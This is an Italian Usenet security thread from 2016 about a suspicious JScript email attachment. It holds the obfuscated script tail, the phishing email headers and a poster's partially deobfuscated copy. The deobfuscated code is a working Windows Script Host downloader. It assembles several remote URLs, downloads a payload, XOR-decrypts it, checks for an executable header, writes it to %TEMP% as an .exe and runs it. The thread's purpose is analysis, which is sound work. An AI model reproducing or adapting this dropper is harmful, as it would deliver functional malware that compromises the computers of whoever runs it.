>>> \x20 \x20 \x20 \x20 \x20 \x20 \x20 \x20
>>>
>>>
\r\n\x53q[87\x334]=2\x33\x36;\r\nSq[9\x36\x36]=237;\r\nSq[949]=238;\r\nSq[8745]=239\x3b\r\nS\x71[88\x301]=5345

>>> - 5105;\r\x0aSq[177]=101 * \x32 + 39;\r\x0aSq[8805\x5d=-5465 +
>>> 5707;\r\nSq[8804]=243;\r\nSq[1522
>>>
+\x207470]=244\x3b\r\x0aSq[\x38\x39\x393]=245;\r\nSq[247]=246;\x0d\nSq[\x38776\x5d=247;\r\nSq[30

>>> * 5 + 26]\x3d3924 -
>>>
3676;\r\n\x53q[8729]\x3d249;\r\nSq\x5b183]=250;\r\nSq[8730]=251;\r\nSq[8319\x5d=252;\r\n\x53\x71[-6592

>>> +
>>>
6770]=253;\r\x0aS\x71\x5b9632]=254;\r\n\x53q[160]=255;\r\n\t\x0d\n\tvar\x20HFz=new

>>> Array\x28);\r\n\t\x66or \x28var \x4fPj\x3d6938 - 6938; OP\x6a \x3c
>>> Tf0[J\x51u\x28QSc) + (function\x20Cn\x32(){return \x4fXv9;}())];
>>> OPj++\x29\r\n\t\x7b\r\n\t\tva\x72 EFq7=Tf0[Xu4 + IDg5(RVk\x29 +
>>> Ir8](OPj);\r\n\t\tif \x28EFq7 < \x284 * 3\x32))\r\n\t\x09\t{\x76\x61r
>>> ENo=\x45Fq7;}\r\n\t\x09\x65lse\r\n\t\t\t{var
>>> ENo=Sq[EFq7];}\r\n\t\tHFz[(function \x47k(){retu\x72n RUn9;}()) +
>>> JVi\x5d(\x45No);\r\n\t};\r\x0a\t\r\n\treturn
>>> HFz;\r\n}\x3b\r\n\r\n\r\x0afunction Ly(\x44\x48f1 /* k \x2a/)\r\n{\r\n
>>> \x20 \x76ar Pa7=new
>>>
\x41rray();\r\n\t\r\nPa7[128\x5d=199;\r\nPa7[129'+''+']=252\x3b\r\nPa7[130]=233;\r\nPa7[131]=226\x3b\r\nPa\x37[1\x332]=228\x3b\r\nPa7[133]=224;\r\nPa7[134]=229;\r\x0a\x50\x617[13\x35]\x3d231;\r\nPa7[136]=2\x334;\r\nPa7[137\x5d=235;\r\x0aPa7[138]=232;\r\nPa7[13\x39]\x3d239;\x0d\nPa7[1\x340]=\x3238;\r\x0a\x50\x617[25

>>> * 5 +
>>> \x316]=236;\r\nPa7[142]=19\x36;\r\nPa\x37[143]=19\x37\x3b\x0d\nPa7[\x32210
>>> - 2066]=8219 - 8018;\r\nPa7[145]=230;\r\nPa7[\x37123 -
>>> 6977]=198;\r\nPa\x37[3\x3078 -
>>> \x32931]=244;\r\x0aPa7[148]=246;\x0d\nP\x617[5\x34 *\x202 + 41]=-74\x351
>>> \x2b
>>>
7693\x3b\r\nPa7\x5b150]=251\x3b\r\nPa7[151]=\x324\x39;\r\x0aPa\x37[152]\x3d255;\r\nPa7[73

>>> \x2a 2 \x2b 7]=2\x314;\r\nPa7[154]=220;\r\n\x50a7[-378\x37 +
>>> 3942]=162;\r\nPa7[\x3857 - 7\x301]=163;\r\nP\x617[2435\x20-
>>> 2\x3278]\x3d7\x3487 - 7322;\r\nPa7[-833\x38 + 8496]=1327 +
>>> 70\x33\x32\x3b\r\nPa7\x5b159]=402\x3b\r\nPa7[13 *\x201\x32 +
>>> 4]=225;\r\nPa7[1\x361\x5d=-7323 +
>>>
7\x3560;\r\nPa7[162]\x3d243;\r\nPa7[163\x5d=250;\r\x0a\x50a7[164]=241;\r\nP\x617[-7646\x20+

>>> 7\x3811]=209;\r\nPa7\x5b64 * 2 \x2b 38]=\x31535
>>> -\x201365\x3b\r\n\x50a7[16\x37]=186;\r\x0aPa7[-307 + 475]=60 * 3 +
>>> 1\x31;\r\nPa7[7758 \x2d 7589]=945 * 9 +
>>>
\x347\x31;\x0d\nPa7[170]=172;\r\nPa7[171\x5d=189;\r\nPa7[172]=188;\r\nPa7[173]=15

>>> * 10 + 1\x31;\r\nPa7\x5b-7814 +
>>> 7988]=17\x31;\r\nPa7[\x31\x37\x35]=187;\r\nPa7\x5b1\x376]=1\x37\x3023 -
>>>
7406;\r\n\x50a7[177]=9618;\r\nPa7[178]=9619;\r\nPa7[179]=9474;\r\nPa7[888\x37
>>> -
>>>
8707]=9508;\r\nP\x617[1\x38'+''+'1]=9569;\r\nPa7[182]=9570;\r\nPa7[1\x383]=2474
>>> *\x203 + 2\x31\x336;\r\x0aPa7[\x3184]=9557\x3b\x0d\nPa7[185]=17863 -
>>> 8292;\r\nPa7[\x3186]=17177 - 7624;\r\nPa7[10143 - \x39956]=3117\x20* 3 +
>>> 2\x30\x38;\r\nPa7[188]=9565;\x0d\nPa7[7026 \x2d
>>> 6837]=9564;\r\x0aPa7[19\x30]=956\x33;\r\nPa7\x5b-69\x360 +
>>> 7151]\x3d9488;\r\nPa\x37[192]=24 * 395 +
>>> 12;\r\x0aPa7[193]=9524;\r\n\x50a7[7489 - 7295]=11205 -
>>> 1689;\r\nPa7[195\x5d=9172 +
>>> 3\x328;\r\nPa7[196]=947\x32;\r\nPa7[197]=9532;\r\nPa7[198]=14\x3788 -
>>> 5222;\r\nPa7[199]=3280 * 2 \x2b
>>> \x33007;\r\x0aPa7[2\x30\x30]=9562\x3b\r\nPa7[-1245 +
>>> 1446]=9556\x3b\r\x0aPa7[-609\x34 + 6296]=9577;\r\nPa7\x5b\x34\x3501\x20-
>>> 4\x3298]=9574\x3b\r\nPa7[-835\x36 + 856\x30]\x3d\x316041 \x2d
>>> 6473;\r\nP\x617[205]=9552;\r\nPa7[206\x5d=18878 -
>>> 9298;\r\n\x50a7\x5b207]=9575;\r\nPa7[208]=957\x36;\r\x0aPa7[209]=16184 -
>>> 6612;\r\n\x50a7[\x329 * 7 +\x207\x5d=3391 +
>>> 618\x32\x3b\r\nP\x61\x37[211]=\x39561;\r\nP\x617[212]=12923 -
>>>
3363\x3b\r\nPa7[213]=9554;\r\nPa7[214]=9555;\r\nPa7[215]=9\x3579;\r\n\x50a7[42\x381

>>> - 4065]\x3d95\x378;\r\nP\x617[21\x37]=9\x3496;\x0d\nPa7[78 * 2 +
>>> 62]=9484;\r\x0a\x50a7\x5b219]\x3d19023 \x2d
>>> 9415;\r\nPa7[220]=9604;\r\nPa7[5 * 4\x34 +
>>> 1\x5d=9612;\x0d\x0aPa7[222]=\x39616;\r\nP\x617[22\x33]=2260 * 4 +
>>> 560;\r\nPa7[224]\x3d945;\r\nP\x617[225]=6228 - 60\x305;\r\nPa7[-4150 \x2b
>>> 4376]=915;\r\nPa7[-3111 + 3\x3338]=960;\r\nPa'+''+'7[\x328 * 8 +
>>> 4]=9\x331;\r\n\x50a7[229\x5d=-\x37943 +
>>> \x3890\x36;\r\nPa\x37[\x3230]=181\x3b\r\nPa7\x5b-6447 +
>>> 6678]=96\x34;\r\nPa7[-2571 \x2b 2803]=934;\r\nPa7[233]=396 * 2 +
>>> 128;\x0d\nP\x617[2\x334]=937;\r\nPa7[235]=281 * 3 +
>>> 105;\r\n\x50a7[236]\x3d873\x34;\r\nPa7[237]\x3d\x32\x35 * 38 +
>>> 16;\r\nPa7[2\x338]=9\x349;\r\nPa7[239]=87\x345;\r\nPa7[240]=-293 +
>>> 909\x34;\r\x0aPa7[89 * 2 +
>>> 63]=\x317\x37;\r\x0aPa7[242\x5d\x3d8805;\r\nPa7[90 \x2a 2 +
>>> \x363]\x3d8804;\x0d\nPa7[24\x34]=8992\x3b\r\nPa\x37\x5b-2514 +
>>> 2759]=2\x354\x33 *\x203 +
>>>
1364;\r\nPa\x37\x5b2\x346]=\x3247;\r\x0aPa7[247]=87\x376;\r\nPa7[\x336\x20\x2a
>>> 6 + 32]=2 * 88;\r\nPa7[249]\x3d8729;\x0d\nPa7[55 * 4 +
>>> 30]=183;\r\nP\x61\x37[2\x351]=1\x36189
>>> -\x207459;\r\nPa7[252]=8319;\r\nP\x617[2\x353]=178;\r\x0aPa7[254]=193\x363
>>> - 9731;\r\n\x50a7[255\x5d=160;\r\n\t\r\n\tva\x72 Dq=new
>>> Array\x28);\r\n\tv\x61r O\x67=""\x3b\r\n\x09var ENo; v\x61\x72
>>> EFq7;\r\n\tfor \x28var \x4fPj=1 * 0;\x20OPj < DHf1[\x51Sc + OXv9\x5d;
>>> OPj++)\r\n\t{\r\n\x09\t\x45No=\x44Hf1[OPj];\r\n\t\tif (ENo < 1\x328)
>>> \r\n\t\t\t{EFq\x37=ENo;}\r\n\t\telse
>>> \r\n\t\t\t{EF\x717=Pa7[ENo]\x3b}\r\n\x09\t\x44q.push(St\x72ing[Kt + Fd\x20+
>>> XU\x77 +
>>> Eo\x36](E\x46q7));\r\n\t}\r\n\t\x0d\n\tOg=Dq[RFj]("");\r\n\t\r\n\tre\x74urn
>>> Og;\r\n\x7d;\r\n\r\x0a\r\nfu\x6ectio\x6e \x56\x678(Ec, DHf\x31 /* k
>>> */)\r\n{\r\n var WHy0=\x57\x53cript\x5bRJe4 + LFp + As3 \x2b
>>> Up(Zu\x29](TYj+Cc0+V\x773(W\x746)+XOs\x20+ Yv \x2b Xf)\x3b\r\n
>>> WHy0[LOe3]=D\x41e;\r\n'+''+'\x20 W\x48y0[Sm2 \x2b Uq]\x3dUMc /* k */;
>>> \r\n\x20 WHy0[IDg]()\x3b\r\n \x20 WHy0[Uf9 + R\x46\x6c + (function
>>> In(){r\x65turn\x20LUg;}(\x29)](L\x79(DHf1\x20/* k */))\x3b\x0d\n
>>> WHy0[Hs2 + Sa0 + ETx9\x20+ ZZ\x638](Ec, \x32);\r\n\r\n WHy0[KCh5 + TZa +
>>> RVy]()\x3b\r\n};';
eval(aMSq4);
WScript.Quit(1);


----
La mail che lo aveva come allegato:

Return-Path: <Sweeney.79422@centennialpr.net>
X-Original-To: ******* ******* yyy.yy
Delivered-To: ******* yyy.yy
Received: from 242-162-231-66-static.centennialpr.net (unknown
[66.231.162.242])
by zz.zzz.zz (Postfix) with ESMTP id AC94924A01A87
for ******* ******* xx>; Tue, 2 Aug 2016 16:42:57 +0200 (CEST)
Received-SPF: pass ******* ******* ******* domain of centennialpr.net
designates
66.231.162.242 as permitted sender) client-ip=66.231.162.242;
envelope-from=sweeney.79422@centennialpr.net;
helo=242-162-231-66-static.centennialpr.net;
Received: from root by centennialpr.net with local (Exim 4.80)
(envelope-from
<bounce-09931306-141303-3369745-5254510@centennialpr.net>)
id gWuDyI-vefhmY-ll
for ******* ******* xx; Tue, 02 Aug 2016 10:42:56 -0400
To: ******* ******* ******* xx>
Subject: Paid bills
X-PHP-Originating-Script: 0:class.phpmailer.php
Date: Tue, 02 Aug 2016 10:42:56 -0400
From: "Bradly Sweeney" <Sweeney.79422@centennialpr.net>
Reply-to: "Bradly Sweeney" <Sweeney.79422@centennialpr.net>
Message-ID: <f12e3326544ac7cf63c5501e2bfa8afc ******* xx>
X-Priority: 3
Sender: <user-E9508@centennialpr.net>
X-Mailer: Email Sending System
X-Complaints-To: m@centennialpr.net
List-Unsubscribe:
<https://www.centennialpr.net/app/unsubscribe.php?p=d>
List-Id: 56243
X-Postmaster-Msgtype: 17601
X-Report-Abuse:
<https://www.centennialpr.net/app/report_abuse.php?mid=0b>
Precedence: bulk
Orig-date: Tue, 02 Aug 2016 10:42:56 -0400
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="b1_0412"

--
Alex

--- news://freenews.netfront.net/ - complaints: news@netfront.net ---
Skywalker Senior 3 Ago 2016 19:46
Sembra che Alex abbia detto :
> Allego un probabile virus che è arrivato in formato compresso .zip
>
> Si tratta di un javascript.
>
> ATTENZIONE: LEGGETELO SOLO CON UN EDITOR DI TESTO, tipo notepad.
>
> Sembra qualcosa che sfrutta le vulnerabilità di Explorer.
>
> Io non riesco a capire con chi vorrebbe comunicare questo presunto virus.
>
> Bye
> Alex
>
> ------------
> VIRUS - LEGGERE SOLO CON NOTEPAD
>

Appena ho aperto il messaggio, Defender si è allarmato, nonostante sia
solo testo!
Arne Saknussemm 4 Ago 2016 09:57
On Tue, 02 Aug 2016 19:12:22 +0200
"Alex" wrote in it.comp.sicurezza.virus
<nnqk9p$1k4l$1@adenine.netfront.net>:


quella sotto è la versione parzialmente "deoffuscata" nel caso a
qualcuno interessi; non credo si tratti di una vuln di IE quanto dello
sfruttamento del motore di scripting di windows, dato che la prima cosa
che lo script fa è caricare il codice in una variabile e subito dopo
eseguirlo usando la "eval" posta in fondo allo script, per quanto poi
riguarda il "cosa faccia", al momento non ho tempo per giocarci, ma se
qualcuno volesse torturarlo ...

var aMSq4 = 'if (WScript.Path["charAt"](WScript.Path.length-1) != "2")
WScript.Quit(0); var Pe10 = "e" + "";
var Uz4 = "clos" + "";
var JTc3 = "oFile" + "";
var Pe1 = "SaveT" + "";
var LUg = "ext" + "";
var RFl = "iteT" + "";
var Uf9 = "wr" + "";
var JQt = "open" + "";
var XDd9 = "set" + "";
var Yu = "Char" + "";
var ULy = "type" + "";
var KOe = "ream" + "";
var HGb9 = "St" + "";
var Uh = "DB." + "";
var Vo5 = "O" + "";
var NJt = "D" + "";
var Gd = "A" + "";
var Sz = "t" + "";
var My9 = "jec" + "";
var Ha1 = "eOb" + "";
var Po0 = "eat" + "";
var Hy8 = "Cr" + "";
var RFj = "join" + "";
var Eo6 = "e" + "";
var XUw = "rCod" + "";
var Fd = "omCha" + "";
var Kt = "fr" + "";
var Fx = "gth" + "";
var Jc = "len" + "";
var JVi = "sh" + "";
var RUn9 = "pu" + "";
function IDg5(MGd){return MGd;};
var Ir8 = "eAt" + "";
var RVk = "od" + "";
var Xu4 = "charC" + "";
var Ec9 = "th" + "";
var SMe3 = "leng" + "";
var Mk4 = "e" + "";
var AQa9 = "clos" + "";
function Pa(Vk){return Vk;};
function NGe4(NSs5){return NSs5;};
var XHa = "ext" + "";
var IGy0 = "ReadT" + "";
var DEm7 = "le" + "";
var Sx = "mFi" + "";
var EHh = "ro" + "";
var Lz = "LoadF" + "";
var Wn = "en" + "";
var El9 = "op" + "";
function Eq9(Mn){return Mn;};
var Uq = "et" + "";
var Sm2 = "Chars" + "";
var Hf8 = "pe" + "";
var ZHh = "ty" + "";
var Ie = "m" + "";
var NFm = "rea" + "";
var KKc1 = "DB.St" + "";
var Zg2 = "O" + "";
var VNd = "D" + "";
var Pv4 = "A" + "";
var SXr = "ct" + "";
var Ix = "Obje" + "";
var YNs7 = "ate" + "";
var Ml7 = "Cre" + "";
var YKl6 = "h" + "";
var Uj = "lengt" + "";
var YJh = "h" + "";
var Zf = "gt" + "";
var VAy5 = "len" + "";
var NCr8 = "ce" + "";
var If0 = "spli" + "";
var Wv2 = "h" + "";
var YCu = "lengt" + "";
var Xg0 = "gth" + "";
var LUo6 = "len" + "";
var RKw = "gth" + "";
var JNj6 = "len" + "";
var RVp0 = "h" + "";
var Zh9 = "lengt" + "";
var PNa5 = "th" + "";
var Lg = "leng" + "";
var Sa1 = "p" + "";
var UZu1 = "Slee" + "";
var Oj9 '+''+'= "23" + "";
var IDj = " 3" + "";
var Et1 = "n" + "";
var ILh6 = "Ru" + "";
var Wx = "ngth" + "";
var Bv5 = "le" + "";
var Ki9 = "h" + "";
var Ma8 = "ngt" + "";
var XUv = "le" + "";
function DEk0(Ja){return Ja;};
function PJh(MTj4){return MTj4;};
var RVy = "e" + "";
var TZa = "os" + "";
var KCh5 = "cl" + "";
function AFy(UWx3){return UWx3;};
var ZZc8 = "le" + "";
var ETx9 = "oFi" + "";
var Sa0 = "veT" + "";
var Hs2 = "Sa" + "";
function Go(SQn5){return SQn5;};
var HXi6 = "n" + "";
var WHy5 = "io" + "";
var MPk5 = "posit" + "";
var GTg = "Body" + "";
var Ih2 = "onse" + "";
var MUc1 = "sp" + "";
var YZb = "Re" + "";
function STv0(Ra0){return Ra0;};
var TVr3 = "e" + "";
var VTk0 = "writ" + "";
var LOe3 = "type" + "";
var JWz3 = "n" + "";
var APp7 = "ope" + "";
function Xp6(Ik){return Ik;};
var Xf = "ream" + "";
var Yv = "St" + "";
var XOs = "DB." + "";
function Vw3(NAa){return NAa;};
var Wt6 = "O" + "";
function Mf(MVd1){return MVd1;};
var Cc0 = "D" + "";
var TYj = "A"'+''+' + "";
var Ee = "t" + "";
var Kf1 = "bjec" + "";
var Yj = "teO" + "";
var FFm = "Crea" + "";
var Lr5 = "Sleep" + "";
var UIm = "d" + "";
var LEs7 = "sen" + "";
var BEf = "gth" + "";
var Uh6 = "len" + "";
function KEx3(TEw){return TEw;};
var Aa9 = "GET" + "";
var IDg = "open" + "";
function Ck9(KFj){return KFj;};
var IDo = "p" + "";
var SDb = "Slee" + "";
var TPl = "h" + "";
var LLl3 = "lengt" + "";
var RRi8 = "ect" + "";
var Aj = "eObj" + "";
var Dr = "Creat" + "";
var ZFt = "gth" + "";
var Bv8 = "len" + "";
function Zk(KHz9){return KHz9;};
var Wi2 = "P" + "";
var Sk = "MLHTT" + "";
var Ze = "2.X" + "";
var NCa = "MSXML" + "";
var NId1 = ".1" + "";
var Xx4 = "t.5" + "";
var GWy = "es" + "";
var Bq1 = "Requ" + "";
var Lf7 = "tp" + "";
var Kf6 = "Ht" + "";
var Aw = "in" + "";
var Bv7 = "tp.W" + "";
var PAn = "Ht" + "";
var ZAe = "Win" + "";
var IFm4 = "/" + "";
var Pr10 = "789+" + "";
var VFa = "23456" + "";
var CCz = "01" + "";
var Wv = "vwxyz" + "";
var '+''+'Pd9 = "rstu" + "";
var VHo = "mnopq" + "";
var VBk = "ijkl" + "";
var Cc = "gh" + "";
var Dv6 = "bcdef" + "";
var Ms = "WXYZa" + "";
var YVo = "RSTUV" + "";
var Ml = "MNOPQ" + "";
var Lm = "IJKL" + "";
var Pr1 = "FGH" + "";
var Zo = "ABCDE" + "";
var USw = "xe" + "";
var IFj0 = ".e" + "";
function Jl(ZYi){return ZYi;};
var Uh8 = "dj" + "";
var LVd = "R7" + "";
var DTv = "pVW" + "";
var Rh1 = "e3" + "";
var RGn = "XN" + "";
function Jn9(Jm3){return Jm3;};
var ZSf = "%/" + "";
var PEc = "%TEMP" + "";
var SSq = "ell" + "";
var DWb8 = "pt.Sh" + "";
var Ot8 = "WScri" + "";
function Up(Wr6){return Wr6;};
var Zu = "t" + "";
var As3 = "jec" + "";
var LFp = "ateOb" + "";
var RJe4 = "Cre" + "";
var IVm = "v" + "";
var Hh = "4zo4c" + "";
var RGl2 = "qk" + "";
var NLs = "l/" + "";
var Wc = "j.p" + "";
var Lq3 = "fu" + "";
var Xs5 = "gra" + "";
var Oj2 = "foto" + "";
var Dt6 = "//" + "";
var Ri5 = "p:" + "";
var Yy1 = "htt" + "";
var Ae = "62" + "";
var Cl8 = "cn" + "'+''+'";
var Un = "lcou" + "";
function RTo2(Xh1){return Xh1;};
var Lr8 = ".com/" + "";
var QRy5 = ******* + "";
var MSc5 = "oi" + "";
var NAm9 = "w.gi" + "";
var Qq = "//ww" + "";
var WSb0 = "p:" + "";
function Rj3(TXh){return TXh;};
var Sj5 = "htt" + "";
var FYs1 = "nt3" + "";
var Nn5 = "43" + "";
var Cy5 = "/07" + "";
var Po = "et" + "";
var RWi = ".n" + "";
var Wn1 = "ana" + "";
var Nl = ".bag" + "";
var Qc4 = "ww" + "";
var Ei = "/w" + "";
var Kx2 = ":/" + "";
var SUf2 = "http" + "";
var Lc = "7" + "";
var Ep3 = "43" + "";
var Vh = "th" + "";
var WKb = "leng" + "";
function Su(SHv4){return SHv4;};
var Xt6 = "VV" + "";
var MSl = "VV" + "";
var Te1 = "VVVVV" + "";
var Zs5 = "VV" + "";
var CZi8 = "fd" + "";
var KJd = "sdfas" + "";
var Dv3 = "asfa" + "";
var OOh = "h" + "";
var Ud8 = "gt" + "";
var FOp3 = "len" + "";
function Zb1(CZq){return CZq;};
var Pa1 = "V" + "";
var Gs4 = "VVVVV" + "";
var TXe8 = "VV" + "";
var HMr4 = "VVVVV" + "";
var Ol = "VVV" + "";
var '+''+'ZDo7 = "VVVV" + "";
var YUc = "VV" + "";
var Xc6 = "VV" + "";
var Wp = "VVVVV" + "";
var Ca8 = "VVVVV" + "";
var Dh5 = "VVV" + "";
var EGw = "VV" + "";
var Mj = "VVVVV" + "";
function Oq(Pf0){return Pf0;};function SGv(KLy5){return KLy5;};function
JQu(KKh4){return KKh4;}; var OXv9 = "gth" + "";
var QSc = "len" + "";
var EYf = "VVV" + "";
var IIk2 = "VV" + "";
var CZy = "VV" + "";
var Jl9 = "VVVVV" + "";
function If(YBe){return YBe;};
var Kg = "132" + "";
var BSs4 = "1123" + "";
var Mz9=(BSs4 + If(Kg), Jl9 + CZy + IIk2 + (function NKy0(){return
EYf;}())); var Te=Mz9[QSc + OXv9];
var NVd=(Mj + (function Oi5(){return EGw;}()) + Dh5 + Ca8 + (function
EPo(){return Wp;}()) + Xc6 + Zb1(YUc) + ZDo7 + Ol + HMr4 + TXe8 + Gs4 +
Pa1); var Gz = 672168; var Id=NVd[QSc + OXv9];
var Pe0=(Dv3 + KJd + (function IMn(){return CZi8;}()), Zs5 + Te1 +
Su(MSl) + Xt6); var UWy4=Pe0[QSc + (function LBy(){return OXv9;}())];

var GRx5=1;
var DAe=2;
var Ya=3607 - 3605;
var UMc="437";

var ERb='+''+'[SUf2+Kx2 + (function Fb(){return Ei;}())+Qc4+(function
Zq9(){return Nl;}())+Wn1+RWi+Po+Cy5 + Nn5+(function GNn(){return
FYs1;}()), Rj3(Sj5)+WSb0+(function Ry0(){return Qq;}())+NAm9+MSc5 +
QRy5+RTo2(Lr8)+Un+Cl8+Ae, Yy1 + Ri5+(function Xl2(){return
Dt6;}())+Oj2+Xs5 + Lq3+Wc+(function Ii(){return NLs;}()) +
RGl2+Hh+IVm]; var Ba5=WScript[RJe4 + LFp + As3 + (function Wc6(){return
Zu;}())](Ot8 + DWb8 + SSq); var
Mz=Ba5.ExpandEnvironmentStrings(Jn9(PEc) + ZSf); var RJp2=Mz + RGn +
Rh1 + Jl(DTv) + (function GOk(){return LVd;}()) + Uh8; var RCn=RJp2 +
IFj0 + USw;

function uheprng() {return (function() {
var o = 48, c = 1, p = o, s = new Array(o);
var i,j;
var base64chars =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; var
mash = Mash(); for (i = 0; i < o; i++) s[i] = mash(Gz);
mash = null;
var random = function( range ) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) *
1.1102230246251565e-16)); }

function rawprng() {
if (++p >= o'+''+') p = 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}return random;}());};

function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
if ( data ) {
data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}

var Pe=[ZAe + PAn + Bv7 + Aw + Kf6 + Lf7 + Bq1 + GWy + Xx4 + NId1,
(function Dq8(){return NCa;}()) + Zk(Ze) + Sk + (function BIy1(){return
Wi2;}())];

for (var OPj=0; OPj < Pe[QSc + (function FTj(){return OXv9;}())]; OPj++)
{
try
{
var Sy=WScript[(function Re1(){return RJe4;}()) +
(function Mh(){return LFp;}()) + As3 + Zu](Pe[OPj]); break;
}
catch (e)
{
continue;
}
};

var Uz=7408 - 7407;
var OEq6=0;
do
{
try
{
if (1== Uz)
{
if (OEq6 >= ERb[QSc + OXv9]'+''+')
{
OEq6=0;
WScript[Ck9(SDb) + IDo](1000);
}
Sy[IDg](KEx3(Aa9), ERb[OEq6++ % ERb[QSc +
OXv9]], false); Sy[LEs7 + (function Od(){return UIm;}())]();
}

if (Sy.readystate < (-1915 + 1919))
{
WScript[SDb + IDo](-1310 + 1410);
continue;
}

var ARt=WScript[RJe4 + LFp + (function CYi(){return
As3;}()) + (function ELr4(){return Zu;}())](TYj+Mf(Cc0)+Wt6+XOs + Yv +
Xp6(Xf)); ARt[IDg](); ARt[LOe3]=GRx5;
ARt[VTk0 + STv0(TVr3)](Sy[YZb + MUc1 + Ih2 + GTg]);
ARt[MPk5 + WHy5 + Go(HXi6)]=1 * 0;
ARt[Hs2 + AFy(Sa0) + (function Ix6(){return ETx9;}()) +
ZZc8](RJp2, Ya); ARt[DEk0(KCh5) + TZa + PJh(RVy)]();

var HFz=KTb8 /* k */(RJp2);
HFz=BKw(HFz);
if (HFz[QSc + OXv9] < 100 * 1024 || HFz[QSc + Oq(OXv9)]
> (58 * 3 + 56) * 1024 || !VOy7(HFz)) {
Uz=1;
continue;
}
try
{
Vg8(RCn, HFz);
}
catch (e) {break;};

Ba5[ILh6 + Et1](RCn + (function JYj5(){return IDj;}())
+ Oj9); break;
}
catc'+''+'h (e) {WScript[SDb + IDo](1000); continue;};
} while (Uz);

WScript.Quit(0);

function BKw(DHf1 /* k */)
{
var REt2;

var XPx8 = uheprng();
for (var OPj=0; OPj < DHf1[QSc + OXv9]; OPj++)
{
DHf1[OPj] ^= XPx8(256);
}

var Cm=DHf1[DHf1[QSc + SGv(OXv9)]-4] | DHf1[DHf1[QSc + OXv9]-3]
<< (-1476 + 1484) | DHf1[DHf1[QSc + OXv9]-2] << 16 |
DHf1[DHf1[QSc + OXv9]-1] << 24; DHf1[If0 + NCr8](HFz[QSc +
OXv9]-4, 4); REt2=Te;
for (var OPj=0; OPj < DHf1[QSc + OXv9]; OPj++)
{
REt2=(REt2 + DHf1[OPj]) % 0x100000000;
};
if (REt2 != Cm) {return [];};

return DHf1 /* k */;
};


function VOy7(DHf1 /* k */)
{
if (DHf1[0]== 0x4D && DHf1[1]== 0x5a)
{return true;}
else
{return false;}
};


function KTb8 /* k */(Ec)
{
var WHy0=WScript[RJe4 + LFp + As3 + (function Wc0(){return
Zu;}())](TYj+(function Gi2(){return Cc0;}())+Wt6+XOs + Yv + Xf);
WHy0[LOe3]=DAe; WHy0[Sm2 + Eq9(Uq)]=UMc /* k */;
WHy0[IDg]();
WHy0[Lz + EHh + Sx + DE'+''+'m7](Ec);
var Bw=WHy0[Pa(IGy0) + NGe4(XHa)];
WHy0[KCh5 + TZa + RVy]();
return NFc(Bw);
};


function NFc(Tf0)
{
var Sq=new Array();

Sq[2071 - 1872]=128;
Sq[252]=129;
Sq[233]=130;
Sq[226]=-370 + 501;
Sq[228]=5449 - 5317;
Sq[224]=133;
Sq[229]=134;
Sq[231]=135;
Sq[-1236 + 1470]=136;
Sq[235]=-6251 + 6388;
Sq[52 * 4 + 24]=-6678 + 6816;
Sq[239]=9632 - 9493;
Sq[25 * 9 + 13]=140;
Sq[236]=141;
Sq[-1000 + 1196]=142;
Sq[6707 - 6510]=37 * 3 + 32;
Sq[201]=144;
Sq[5754 - 5524]=145;
Sq[198]=146;
Sq[244]=-9711 + 9858;
Sq[246]=-8937 + 9085;
Sq[242]=149;
Sq[7242 - 6991]=150;
Sq[249]=6872 - 6721;
Sq[255]=152;
Sq[28 * 7 + 18]=153;
Sq[220]=154;
Sq[162]=155;
Sq[163]=156;
Sq[165]=157;
Sq[1090 * 7 + 729]=158;
Sq[402]=-4162 + 4321;
Sq[225]=160;
Sq[237]=-1832 + 1993;
Sq[243]=162;
Sq[20 * 12 + 10]=163;
Sq[241]=164;
Sq[209]=77 * 2 + 11;
Sq[170]=166;
Sq[3079 - 2893]=167;
Sq[191]=83 * 2 + 2;
Sq[8976]=-4856 + 5025;
Sq[172]=170;
Sq[8635 - 8446]=171;
Sq'+''+'[188]=172;
Sq[161]=-6756 + 6929;
Sq[171]=174;
Sq[187]=175;
Sq[9617]=176;
Sq[6264 + 3354]=177;
Sq[9619]=55 * 3 + 13;
Sq[9474]=179;
Sq[9508]=9225 - 9045;
Sq[9569]=181;
Sq[9570]=182;
Sq[9558]=183;
Sq[18638 - 9081]=184;
Sq[9571]=185;
Sq[9553]=186;
Sq[9559]=187;
Sq[4507 + 5058]=188;
Sq[9564]=189;
Sq[15896 - 6333]=190;
Sq[5416 + 4072]=191;
Sq[1142 * 8 + 356]=85 * 2 + 22;
Sq[1285 * 7 + 529]=193;
Sq[9516]=194;
Sq[9500]=195;
Sq[9472]=196;
Sq[3928 + 5604]=197;
Sq[9566]=198;
Sq[9330 + 237]=199;
Sq[2706 + 6856]=97 * 2 + 6;
Sq[9556]=201;
Sq[9577]=202;
Sq[5251 + 4323]=203;
Sq[4346 * 2 + 876]=204;
Sq[9552]=205;
Sq[9580]=206;
Sq[9575]=7962 - 7755;
Sq[9576]=208;
Sq[9572]=209;
Sq[9573]=210;
Sq[9561]=211;
Sq[9560]=212;
Sq[9554]=213;
Sq[9555]=214;
Sq[9579]=215;
Sq[9578]=47 * 4 + 28;
Sq[9496]=217;
Sq[9484]=218;
Sq[9608]=219;
Sq[9604]=5823 - 5603;
Sq[9612]=221;
Sq[9616]=59 * 3 + 45;
Sq[3850 * 2 + 1900]=223;
Sq[945]=224;
Sq[-5278 + 5501]=225;
Sq[915]'+''+'=226;
Sq[-6277 + 7237]=227;
Sq[931]=-1173 + 1401;
Sq[237 * 4 + 15]=229;
Sq[181]=-8247 + 8477;
Sq[964]=231;
Sq[934]=88 * 2 + 56;
Sq[920]=233;
Sq[937]=234;
Sq[336 * 2 +
276]=235; Sq[8734]=236;
Sq[966]=237;
Sq[949]=238;
Sq[8745]=239;
Sq[8801]=5345 - 5105;
Sq[177]=101 * 2 + 39;
Sq[8805]=-5465 + 5707;
Sq[8804]=243;
Sq[1522 + 7470]=244;
Sq[8993]=245;
Sq[247]=246;
Sq[8776]=247;
Sq[30 * 5 + 26]=3924 - 3676;
Sq[8729]=249;
Sq[183]=250;
Sq[8730]=251;
